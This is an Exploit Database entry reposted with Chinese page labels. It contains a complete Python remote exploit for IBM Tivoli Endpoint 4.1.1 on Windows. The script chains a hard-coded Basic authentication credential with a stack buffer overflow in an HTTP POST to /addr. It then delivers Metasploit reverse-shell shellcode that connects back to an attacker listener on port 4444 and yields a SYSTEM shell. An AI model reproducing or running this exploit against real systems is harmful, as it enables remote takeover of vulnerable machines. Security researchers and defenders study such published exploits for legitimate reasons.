IBM Tivoli Endpoint 4.1.1 – Remote SYSTEM

• Exploit Database
• 10 阅读

• 作者： Jeremy Brown
  日期： 2011-06-07
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17365/

• #!/usr/bin/python
  # tiv-sys.py
  # IBM Tivoli Endpoint 4.1.1 Remote SYSTEM Exploit
  # Jeremy Brown [0xjbrown41-gmail-com]
  # June 2011
  #
  # Discovered by: Brian Adeloye of Tenable Network Security
  #
  # This exploit makes use of two vulnerabilities:
  #
  # 1) Base64 authentication credentials hard-coded in lcfd.exe
  # 2) Stack-based buffer overflow when parsing HTTP variable values
  #
  # Tested on Tivoli Endpoint 4.1.1-LCF-0048 running on Windows XP SP3
  #
  # $ python tiv-sys.py 192.168.0.188
  # .....
  # $ nc -v -l 4444
  # Connection from 192.168.0.188 port 4444 [tcp/*] accepted
  # Microsoft Windows XP [Version 5.1.2600]
  # (C) Copyright 1985-2001 Microsoft Corp.
  #
  # C:\Program Files\Tivoli\lcf\dat\1>
  #
  # References:
  #
  # http://www.zerodayinitiative.com/advisories/ZDI-11-169/
  # https://www-304.ibm.com/support/docview.wss?uid=swg21499146
  #
  
  import sys
  import struct
  import socket
  import httplib
  import urllib
  
  port=9495
  
  ret=0x7C96BF33 # jmp esp @ user32.dll
  junk="B"*256
  
  # windows/shell_reverse_tcp - 333 bytes
  # http://www.metasploit.com
  # Encoder: x86/countdown
  # LHOST=192.168.0.198, LPORT=4444, ReverseConnectRetries=5, 
  # EXITFUNC=thread, InitialAutoRunScript=, AutoRunScript=
  payload=(
  "\x2b\xc9\x66\xb9\x39\x01\xe8\xff\xff\xff\xff\xc1\x5e\x30"
  "\x4c\x0e\x07\xe2\xfa\xfd\xea\x8a\x04\x05\x06\x67\x81\xec"
  "\x3b\xd9\x68\x86\x5c\x3f\x9b\x43\x1e\x98\x46\x01\x9d\x65"
  "\x30\x16\xad\x51\x3a\x2c\xe1\x2e\xe0\x8d\x1e\x42\x58\x27"
  "\x0a\x07\xe9\xe6\x27\x2a\xeb\xcf\xde\x7d\x67\xba\x60\x23"
  "\xbf\x77\x0a\x36\xe8\xb2\x7a\x43\xb9\xfd\x4a\x75\x41\x91"
  "\x12\xc8\x0c\x5d\xcd\x1f\x68\x48\x99\xa8\x70\x04\xc5\x7b"
  "\xdb\x50\x84\x62\xab\x64\x96\xfb\x99\x96\x57\x5a\x9b\x65"
  "\xbe\x2a\x94\x62\x1f\x9b\x5f\x18\x42\x12\x8a\x31\xe1\x33"
  "\x48\x6c\xbd\x09\xfb\x7d\x39\xf8\x2c\x69\x77\xa4\xf3\x7d"
  "\xf1\x7a\xac\xf4\x3a\x5b\xa4\xda\xd9\xe2\xdd\xdf\xd7\x78"
  "\x68\xd1\xd5\xd1\x07\x9f\x65\x09\xcd\xf9\xa1\xa1\x94\x95"
  "\xfe\xe0\xeb\xab\xc5\xcf\xf4\xd1\xe9\xb9\xa7\x5e\x77\x1b"
  "\x34\xa4\xa6\xa7\x81\x6d\xfe\xfb\xc4\x84\x2e\xc4\xb0\x4e"
  "\x67\xe3\xe4\xe5\xe6\xf7\xe8\xf9\xea\xd3\x56\xb2\x61\x5f"
  "\x3f\x14\x4b\x04\xac\x05\x6e\xc7\x0e\xa1\xc8\xcb\xdd\x91"
  "\x47\x29\xba\xc1\x84\x84\xbc\x4c\x73\xa3\xb9\x26\x0f\xb3"
  "\xbf\xb0\xba\xdf\x69\x02\xb5\xb4\xb3\xd4\x10\x8d\xfa\xb0"
  "\xbc\x09\x11\x8b\x29\xab\xd4\xcd\xf3\xf2\x79\xb1\xd2\xe7"
  "\x3e\xf9\xbe\xaf\xac\xab\xa8\xa9\x46\x57\x4c\x55\x52\x56"
  "\x50\x6f\x71\xc5\x35\x8d\xf3\xd8\x87\xef\x5e\x47\x54\xec"
  "\x24\x7d\x1e\x90\x05\x79\xe5\xce\xa7\xfd\x03\x35\x2a\x49"
  "\x84\xb6\x99\xb8\xd9\xf2\x14\x2f\x56\x21\xac\xd6\xce\x5a"
  "\x35\x8a\x75\x20\x46\x5a\x5c\x37\x6b\xc6\xef")
  
  if len(sys.argv)<2:
   print "Usage: "+sys.argv[0]+" <target> [port]"
   sys.exit(0)
  
  target=sys.argv[1]
  if len(sys.argv)==3:
   port=int(sys.argv[2])
  
  retaddr=struct.pack("<L",ret)
  
  data=urllib.urlencode({"test":junk+retaddr+payload})
  size=5+len(junk)+len(retaddr)+len(payload) # 'test=' = 5 (also works with just '=')
  hdrs={"Host":"pw.n","Content-Length":size,"Authorization":"Basic dGl2b2xpOmJvc3M="} # tivoli:boss
  
  conn=httplib.HTTPConnection(target,port)
  conn.request("POST","/addr",data,hdrs)
  conn.close()